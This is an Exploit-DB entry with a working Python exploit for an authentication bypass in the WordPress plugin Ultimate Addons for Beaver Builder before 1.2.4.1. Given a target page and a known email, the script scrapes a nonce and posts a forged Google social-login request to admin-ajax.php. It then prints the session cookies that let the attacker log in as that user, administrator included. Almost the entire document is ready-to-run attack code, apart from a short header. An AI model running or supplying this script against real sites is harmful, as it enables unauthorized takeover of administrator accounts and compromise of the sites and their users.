WordPress Plugin Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass

EDB-ID:

47832

CVE:

N/A




Platform:

PHP

Date:

2019-12-31


# Exploit Title: Wordpress Ultimate Addons for Beaver Builder 1.2.4.1 - Authentication Bypass
# Date: 2019-12-21
# Exploit Authors: Raphael Karger & Nathan Hrncirik
# Vendor Homepage: https://www.ultimatebeaver.com/
# Version: Ultimate Addons for Beaver Builder < 1.2.4.1
'''

Requirements:
    * Valid Admin/User Email Needs to be Known
    * Social Media Login Form has to be Embedded in the Specified URL

'''

#!/usr/bin/python3

import requests
import urllib.parse
import json
import argparse

banner = r''' ____ ___  _____ _______________________________              .__         .__  __   
|    |   \/  _  \\______   \______   \_   _____/__  _________ |  |   ____ |__|/  |_ 
|    |   /  /_\  \|    |  _/|    |  _/|    __)_\  \/  /\____ \|  |  /  _ \|  \   __\
|    |  /    |    \    |   \|    |   \|        \>    < |  |_> >  |_(  <_> )  ||  |  
|______/\____|__  /______  /|______  /_______  /__/\_ \|   __/|____/\____/|__||__|  
                \/       \/        \/        \/      \/|__|                         
Ultimate Addons for Beaver Builder < 1.2.4.1 - Authentication Bypass
'''

class exploit(object):
    def __init__(self, page, email):
        self.page = page
        self.sess = requests.Session()
        self.email = email
        self.nonce = False

    def get_nonce(self):
        try:
            nonce_req = self.sess.get(self.page)
            if nonce_req.text.find("data-nonce=") != -1:
                self.nonce = nonce_req.text.split("data-nonce=")[1].split(">")[0]
        except Exception as e:
            print("Nonce Error: {}".format(e))

    def auth_bypass(self):
        try:
            schema = urllib.parse.urlparse(self.page)
            resp = self.sess.post("{}://{}/wp-admin/admin-ajax.php".format(schema.scheme, schema.netloc), data={
                    "action" : "uabb-lf-google-submit",
                    "name" : "raphaelrocks",
                    "email" : self.email,
                    "nonce" : self.nonce
            })
            if resp.status_code == 200:
                print("Exploit Successful, Use the Cookies to Login: \n{}".format(
                    json.dumps(self.sess.cookies.get_dict(), indent=4)
                ))
        except Exception as e:
            print("Auth Bypass Error: {}".format(e))

    def begin_exploit(self):
        self.get_nonce()
        if self.nonce:
            print("Found Nonce: {}".format(self.nonce))
            self.auth_bypass()
        else:
            print("Failed to Gather Nonce")

if __name__ == "__main__":
    print(banner)
    parser = argparse.ArgumentParser()
    parser.add_argument("-e", "--email", dest="email", help="Email of Administrator User/Privileged User", required=True)
    parser.add_argument("-u", "--url", dest="url", help="URL With Social Media Login Form", required=True)
    args = parser.parse_args()
    ex = exploit(args.url, args.email)
    ex.begin_exploit()